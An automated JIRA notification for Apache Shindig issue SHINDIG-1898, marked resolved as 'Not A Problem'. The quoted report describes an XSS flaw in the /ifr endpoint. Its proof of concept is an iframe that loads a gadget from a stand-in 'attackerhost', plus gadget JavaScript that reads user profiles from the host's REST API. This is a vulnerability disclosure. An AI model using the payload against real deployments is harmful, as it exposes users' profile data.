[
https://issues.apache.org/jira/browse/SHINDIG-1898?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
Henry Saputra resolved SHINDIG-1898.
------------------------------------
Resolution: Not A Problem
> XSS vulnerability through /ifr
> ------------------------------
>
> Key: SHINDIG-1898
> URL: https://issues.apache.org/jira/browse/SHINDIG-1898
> Project: Shindig
> Issue Type: Bug
> Reporter: M. van Cuijk
> Labels: security
>
> When a gadget contains JavaScript, it will be run in the domain context of
> the Shindig application, since the gadget is loaded through /ifr on the
> Shindig host. Therefore, gadgets are capable of doing HTTP requests to any
> URI on this host.
> Loading a gadget through /ifr is controlled by the "url" query string
> parameter, but no restrictions are placed on the value of this parameter.
> Only the URL of gadgets that have previously been added to the container by
> the user should be allowed for this parameter. Any other URL should result in
> an error.
> The current situation allows an attacker to trick a user into opening a
> website on any domain, including an iframe like this one:
> <iframe
> src="https://shindighost/gadgets/ifr?url=http%3A%2F%2Fattackerhost%2Fexploit.gadget.xml&container=default&view=canvas&nocache=1";></iframe>
> Since the "url" parameter is not required to point to a gadget that has been
> added by the user, any URL is accepted. Any JavaScript code that is contained
> in the gadget is capable of doing HTTP requests to URIs under
> https://shindighost/, e.g. with code like this:
> <Module>
> <ModulePrefs title="Exploit" description="P0wned!" author="Mark van
> Cuijk" width="60" height="140">
> </ModulePrefs>
> <Content type="html" view="canvas">
> <![CDATA[<!DOCTYPE html>
> <script type="text/javascript"
> src="https://shindighost/webresources/js/lib/jquery.min.js";></script>
> <script type="text/javascript">
> $(function() {
> $.ajax({
> url:
> 'https://shindighost/rest/userprofiles',
> success: function(d) {
> var t = d.length + ' profiles
> found.\n'
> + 'First profile: '
> + d[0].openId;
> window.alert(t);
> }
> });
> });
> </script>
> ]]>
> </Content>
> </Module>
> Now, when an authenticated user is pointed to the URL containing the iframe
> above, the actual result is that a popup is displayed showing the total
> number of user profiles in the application server and the OpenID identifier
> of the first profile returned. The desired result is that no popup is
> displayed, because the gadget and therefore the JavaScript is not loaded in
> the iframe in the first place.
--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators
For more information on JIRA, see: http://www.atlassian.com/software/jira
